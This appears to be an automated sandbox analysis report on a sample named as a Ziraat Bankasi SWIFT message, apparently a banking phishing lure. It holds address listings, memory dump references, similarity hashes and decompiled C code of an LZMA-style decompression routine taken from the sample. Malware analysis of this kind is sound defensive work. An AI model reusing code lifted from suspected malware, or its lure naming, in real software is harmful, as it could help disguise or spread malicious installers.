                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x004063fa
                                  0x004063fa
                                  0x00000000
                                  0x004063fa
                                  0x0040667b
                                  0x004068b0
                                  0x004068d2
                                  0x004068d8
                                  0x004068da
                                  0x004068e1
                                  0x004068e3
                                  0x004068ea
                                  0x004068ee
                                  0x00000000
                                  0x00405edf
                                  0x004068e7
                                  0x004068e7
                                  0x00000000
                                  0x004068e7
                                  0x00406734
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00406811
                                  0x00000000
                                  0x00406686

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                                  • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                                  • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                                  • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406398() {
                                  				unsigned short _t532;
                                  				signed int _t533;
                                  				void _t534;
                                  				void* _t535;
                                  				signed int _t536;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t589;
                                  				signed int* _t606;
                                  				void* _t613;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t613 - 0x40) != 0) {
                                  						L89:
                                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                  						L69:
                                  						_t606 =  *(_t613 - 0x58);
                                  						 *(_t613 - 0x84) = 0x12;
                                  						L132:
                                  						 *(_t613 - 0x54) = _t606;
                                  						L133:
                                  						_t532 =  *_t606;
                                  						_t589 = _t532 & 0x0000ffff;
                                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  						if( *(_t613 - 0xc) >= _t565) {
                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  							 *(_t613 - 0x40) = 1;
                                  							_t533 = _t532 - (_t532 >> 5);
                                  							 *_t606 = _t533;
                                  						} else {
                                  							 *(_t613 - 0x10) = _t565;
                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                  						}
                                  						if( *(_t613 - 0x10) >= 0x1000000) {
                                  							L139:
                                  							_t534 =  *(_t613 - 0x84);
                                  							L140:
                                  							 *(_t613 - 0x88) = _t534;
                                  							goto L1;
                                  						} else {
                                  							L137:
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 5;
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  							goto L139;
                                  						}
                                  					} else {
                                  						if( *(__ebp - 0x60) == 0) {
                                  							L171:
                                  							_t536 = _t535 | 0xffffffff;
                                  							L172:
                                  							return _t536;
                                  						}
                                  						__eax = 0;
                                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  						0 | _t258 = _t258 + _t258 + 9;
                                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  						L75:
                                  						if( *(__ebp - 0x64) == 0) {
                                  							 *(__ebp - 0x88) = 0x1b;
                                  							L170:
                                  							_t568 = 0x22;
                                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                  							_t536 = 0;
                                  							goto L172;
                                  						}
                                  						__eax =  *(__ebp - 0x14);
                                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  						if(__eax >=  *(__ebp - 0x74)) {
                                  							__eax = __eax +  *(__ebp - 0x74);
                                  						}
                                  						__edx =  *(__ebp - 8);
                                  						__cl =  *(__eax + __edx);
                                  						__eax =  *(__ebp - 0x14);
                                  						 *(__ebp - 0x5c) = __cl;
                                  						 *(__eax + __edx) = __cl;
                                  						__eax = __eax + 1;
                                  						__edx = 0;
                                  						_t274 = __eax %  *(__ebp - 0x74);
                                  						__eax = __eax /  *(__ebp - 0x74);
                                  						__edx = _t274;
                                  						__eax =  *(__ebp - 0x68);
                                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  						_t283 = __ebp - 0x64;
                                  						 *_t283 =  *(__ebp - 0x64) - 1;
                                  						 *( *(__ebp - 0x68)) = __cl;
                                  						L79:
                                  						 *(__ebp - 0x14) = __edx;
                                  						L80:
                                  						 *(__ebp - 0x88) = 2;
                                  					}
                                  					L1:
                                  					_t535 =  *(_t613 - 0x88);
                                  					if(_t535 > 0x1c) {
                                  						goto L171;
                                  					}
                                  					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                                  						case 0:
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							_t535 =  *( *(_t613 - 0x70));
                                  							if(_t535 > 0xe1) {
                                  								goto L171;
                                  							}
                                  							_t539 = _t535 & 0x000000ff;
                                  							_push(0x2d);
                                  							asm("cdq");
                                  							_pop(_t570);
                                  							_push(9);
                                  							_pop(_t571);
                                  							_t609 = _t539 / _t570;
                                  							_t541 = _t539 % _t570 & 0x000000ff;
                                  							asm("cdq");
                                  							_t604 = _t541 % _t571 & 0x000000ff;
                                  							 *(_t613 - 0x3c) = _t604;
                                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                  								L10:
                                  								if(_t612 == 0) {
                                  									L12:
                                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  									goto L15;
                                  								} else {
                                  									goto L11;
                                  								}
                                  								do {
                                  									L11:
                                  									_t612 = _t612 - 1;
                                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                  								} while (_t612 != 0);
                                  								goto L12;
                                  							}
                                  							if( *(_t613 - 4) != 0) {
                                  								GlobalFree( *(_t613 - 4));
                                  							}
                                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                  							 *(_t613 - 4) = _t535;
                                  							if(_t535 == 0) {
                                  								goto L171;
                                  							} else {
                                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                  								goto L10;
                                  							}
                                  						case 1:
                                  							L13:
                                  							__eflags =  *(_t613 - 0x6c);
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 1;
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							_t45 = _t613 - 0x48;
                                  							 *_t45 =  *(_t613 - 0x48) + 1;
                                  							__eflags =  *_t45;
                                  							L15:
                                  							if( *(_t613 - 0x48) < 4) {
                                  								goto L13;
                                  							}
                                  							_t547 =  *(_t613 - 0x40);
                                  							if(_t547 ==  *(_t613 - 0x74)) {
                                  								L20:
                                  								 *(_t613 - 0x48) = 5;
                                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                  								goto L23;
                                  							}
                                  							 *(_t613 - 0x74) = _t547;
                                  							if( *(_t613 - 8) != 0) {
                                  								GlobalFree( *(_t613 - 8));
                                  							}
                                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                  							 *(_t613 - 8) = _t535;
                                  							if(_t535 == 0) {
                                  								goto L171;
                                  							} else {
                                  								goto L20;
                                  							}
                                  						case 2:
                                  							L24:
                                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                  							 *(_t613 - 0x84) = 6;
                                  							 *(_t613 - 0x4c) = _t554;
                                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                  							goto L132;
                                  						case 3:
                                  							L21:
                                  							__eflags =  *(_t613 - 0x6c);
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 3;
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							_t67 = _t613 - 0x70;
                                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                  							__eflags =  *_t67;
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  							L23:
                                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                  							if( *(_t613 - 0x48) != 0) {
                                  								goto L21;
                                  							}
                                  							goto L24;
                                  						case 4:
                                  							goto L133;
                                  						case 5:
                                  							goto L137;
                                  						case 6:
                                  							__edx = 0;
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x34) = 1;
                                  								 *(__ebp - 0x84) = 7;
                                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  							__esi =  *(__ebp - 0x60);
                                  							__cl = 8;
                                  							__cl = 8 -  *(__ebp - 0x3c);
                                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  							__ecx =  *(__ebp - 0x3c);
                                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  							__ecx =  *(__ebp - 4);
                                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  							__eflags =  *(__ebp - 0x38) - 4;
                                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  							if( *(__ebp - 0x38) >= 4) {
                                  								__eflags =  *(__ebp - 0x38) - 0xa;
                                  								if( *(__ebp - 0x38) >= 0xa) {
                                  									_t98 = __ebp - 0x38;
                                  									 *_t98 =  *(__ebp - 0x38) - 6;
                                  									__eflags =  *_t98;
                                  								} else {
                                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  								}
                                  							} else {
                                  								 *(__ebp - 0x38) = 0;
                                  							}
                                  							__eflags =  *(__ebp - 0x34) - __edx;
                                  							if( *(__ebp - 0x34) == __edx) {
                                  								__ebx = 0;
                                  								__ebx = 1;
                                  								goto L61;
                                  							} else {
                                  								__eax =  *(__ebp - 0x14);
                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  								__eflags = __eax -  *(__ebp - 0x74);
                                  								if(__eax >=  *(__ebp - 0x74)) {
                                  									__eax = __eax +  *(__ebp - 0x74);
                                  									__eflags = __eax;
                                  								}
                                  								__ecx =  *(__ebp - 8);
                                  								__ebx = 0;
                                  								__ebx = 1;
                                  								__al =  *((intOrPtr*)(__eax + __ecx));
                                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  								goto L41;
                                  							}
                                  						case 7:
                                  							__eflags =  *(__ebp - 0x40) - 1;
                                  							if( *(__ebp - 0x40) != 1) {
                                  								__eax =  *(__ebp - 0x24);
                                  								 *(__ebp - 0x80) = 0x16;
                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  								__eax =  *(__ebp - 0x28);
                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  								__eax =  *(__ebp - 0x2c);
                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  								__eax = 0;
                                  								__eflags =  *(__ebp - 0x38) - 7;
                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  								__al = __al & 0x000000fd;
                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  								__eax =  *(__ebp - 4);
                                  								__eax =  *(__ebp - 4) + 0x664;
                                  								__eflags = __eax;
                                  								 *(__ebp - 0x58) = __eax;
                                  								goto L69;
                                  							}
                                  							__eax =  *(__ebp - 4);
                                  							__ecx =  *(__ebp - 0x38);
                                  							 *(__ebp - 0x84) = 8;
                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  							goto L132;
                                  						case 8:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x84) = 0xa;
                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  							} else {
                                  								__eax =  *(__ebp - 0x38);
                                  								__ecx =  *(__ebp - 4);
                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                  								 *(__ebp - 0x84) = 9;
                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  							}
                                  							goto L132;
                                  						case 9:
                                  							goto L0;
                                  						case 0xa:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x84) = 0xb;
                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x28);
                                  							goto L88;
                                  						case 0xb:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__ecx =  *(__ebp - 0x24);
                                  								__eax =  *(__ebp - 0x20);
                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  							} else {
                                  								__eax =  *(__ebp - 0x24);
                                  							}
                                  							__ecx =  *(__ebp - 0x28);
                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  							L88:
                                  							__ecx =  *(__ebp - 0x2c);
                                  							 *(__ebp - 0x2c) = __eax;
                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  							goto L89;
                                  						case 0xc:
                                  							L99:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xc;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t334 = __ebp - 0x70;
                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t334;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							__eax =  *(__ebp - 0x2c);
                                  							goto L101;
                                  						case 0xd:
                                  							L37:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xd;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t122 = __ebp - 0x70;
                                  							 *_t122 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t122;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L39:
                                  							__eax =  *(__ebp - 0x40);
                                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  								goto L48;
                                  							}
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								goto L54;
                                  							}
                                  							L41:
                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  							 *(__ebp - 0x48) = __eax;
                                  							__eax = __eax + 1;
                                  							__eax = __eax << 8;
                                  							__eax = __eax + __ebx;
                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edx = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								 *(__ebp - 0x40) = 1;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								__ebx = __ebx + __ebx + 1;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edx;
                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L39;
                                  							} else {
                                  								goto L37;
                                  							}
                                  						case 0xe:
                                  							L46:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xe;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t156 = __ebp - 0x70;
                                  							 *_t156 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t156;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							while(1) {
                                  								L48:
                                  								__eflags = __ebx - 0x100;
                                  								if(__ebx >= 0x100) {
                                  									break;
                                  								}
                                  								__eax =  *(__ebp - 0x58);
                                  								__edx = __ebx + __ebx;
                                  								__ecx =  *(__ebp - 0x10);
                                  								__esi = __edx + __eax;
                                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                                  								__ax =  *__esi;
                                  								 *(__ebp - 0x54) = __esi;
                                  								__edi = __ax & 0x0000ffff;
                                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  								__eflags =  *(__ebp - 0xc) - __ecx;
                                  								if( *(__ebp - 0xc) >= __ecx) {
                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  									__cx = __ax;
                                  									_t170 = __edx + 1; // 0x1
                                  									__ebx = _t170;
                                  									__cx = __ax >> 5;
                                  									__eflags = __eax;
                                  									 *__esi = __ax;
                                  								} else {
                                  									 *(__ebp - 0x10) = __ecx;
                                  									0x800 = 0x800 - __edi;
                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  									__ebx = __ebx + __ebx;
                                  									 *__esi = __cx;
                                  								}
                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  								 *(__ebp - 0x44) = __ebx;
                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                  									continue;
                                  								} else {
                                  									goto L46;
                                  								}
                                  							}
                                  							L54:
                                  							_t173 = __ebp - 0x34;
                                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  							__eflags =  *_t173;
                                  							goto L55;
                                  						case 0xf:
                                  							L58:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xf;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t203 = __ebp - 0x70;
                                  							 *_t203 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t203;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L60:
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								L55:
                                  								__al =  *(__ebp - 0x44);
                                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  								goto L56;
                                  							}
                                  							L61:
                                  							__eax =  *(__ebp - 0x58);
                                  							__edx = __ebx + __ebx;
                                  							__ecx =  *(__ebp - 0x10);
                                  							__esi = __edx + __eax;
                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								_t217 = __edx + 1; // 0x1
                                  								__ebx = _t217;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
